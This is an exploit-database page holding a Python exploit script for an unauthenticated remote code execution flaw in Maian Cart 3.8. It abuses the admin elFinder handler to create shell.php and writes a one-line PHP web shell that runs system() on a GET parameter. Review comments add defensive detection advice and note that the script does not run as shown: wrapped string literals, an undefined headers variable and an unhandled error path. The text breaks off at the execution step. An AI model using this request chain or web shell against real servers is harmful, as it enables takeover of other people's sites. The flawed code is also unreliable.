Exploits / Vulnerability Discovered : 2021-10-08 |
Type : webapps |
Platform : php
This exploit / vulnerability — Maian Cart 3.8 remote code execution (RCE), unauthenticated — is for educational purposes only; if you use it, you do so at your own risk.
import argparse
import requests
from bs4 import BeautifulSoup
import sys
import json
import time
# Flat exploit script for the unauthenticated Maian Cart 3.8 RCE named in the page
# header. Every request below goes to the admin elFinder handler
# (admin/index.php?p=ajax-ops&op=elfinder) with no session cookie and no
# authentication header, which is the substance of the finding: those elFinder
# commands are reachable anonymously. From the defender's side, that URL pattern
# reached by an unauthenticated client is the request to log and alert on.
#
# NOTE: in this copy of the page three string literals are wrapped across two
# lines (the "dir" help text and both connection-error messages); they are left
# exactly as found, so the file does not parse as-is.
parser = argparse.ArgumentParser()
parser.add_argument("host", help="Host to exploit (with http/https prefix)")
parser.add_argument("dir", help="default=/ , starting directory of the
maian-cart instance, sometimes is placed at /cart or /maiancart")
args = parser.parse_args()
# NOTE(review): `args` is never read; host and dir are taken straight from
# sys.argv, so the "default=/" promised in the help text is not implemented.
host = sys.argv[1]
directory = sys.argv[2]
#CREATE THE FILE
# Step 1: ask elFinder to create an empty file named shell.php under
# target=l1_Lw (presumably the volume root hash — confirm against elFinder).
# A successful reply contains an "added" entry.
print("\033[95mCreating the file to write payload to...\n\033[00m", flush=True)
time.sleep(1)
try:
    r = requests.get(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=shell.php&target=l1_Lw")
    print(r.text)
    if "added" in r.text:
        print("\033[95mFile successfully created.\n\033[00m")
    else:
        print("\033[91mSome error occured.\033[00m")
except (requests.exceptions.RequestException):
    # NOTE(review): on a connection failure the script only prints and carries
    # on; `r` is then unbound and the parsing step below fails with NameError
    # rather than a clear message.
    print("\033[91mThere was a connection issue. Check if you're
connected to wifi or if the host is correct\033[00m")
#GET THE FILE ID
# Step 2: pull the elFinder hash of the new file out of the JSON reply.
time.sleep(1)
file_response = r.text
# BeautifulSoup is only used to get the response text back out; the body is
# then parsed as JSON.
soup = BeautifulSoup(file_response,'html.parser')
site_json=json.loads(soup.text)
hash_id = [h.get('hash') for h in site_json['added']]
# str(list) followed by stripping "['" and "']" only yields a clean id when
# "added" holds exactly one entry; more entries would leave separators behind.
file_id = str(hash_id).replace("['", "").replace("']", "")
print("\033[95mGot the file id: ", "\033[91m", file_id , "\033[00m")
print("\n")
#WRITE TO THE FILE
# Step 3: elFinder `put` replaces the file content. The URL-encoded body is a
# one-line PHP web shell that hands a GET parameter to system(). Server-side
# this appears as a POST to the same ajax-ops URL with cmd=put plus a new .php
# file in the elFinder-managed directory — both are worth monitoring, and
# requiring authentication for the ajax-ops handlers blocks every step here.
print("\033[95mWritting the payload to the file...\033[00m")
print("\n")
time.sleep(1)
data = f"cmd=put&target={file_id}&content=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%20%3F%3E"
try:
    # NOTE(review): `headers` is not defined anywhere in the script as shown,
    # so this call raises NameError before any request goes out.
    write = requests.post(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder",
                          headers=headers, data=data)
    print(write.text)
except (requests.exceptions.RequestException):
    print("\033[91mThere was a connection issue. Check if you're
connected to wifi or if the host is correct\033[00m")
#EXECUTE THE PAYLOAD
# Step 4 starts here; the remainder of this stage lies beyond the end of this
# excerpt.
print("\033[95mExecuting the payload...\033[00m")
print("\n")
time.sleep(1)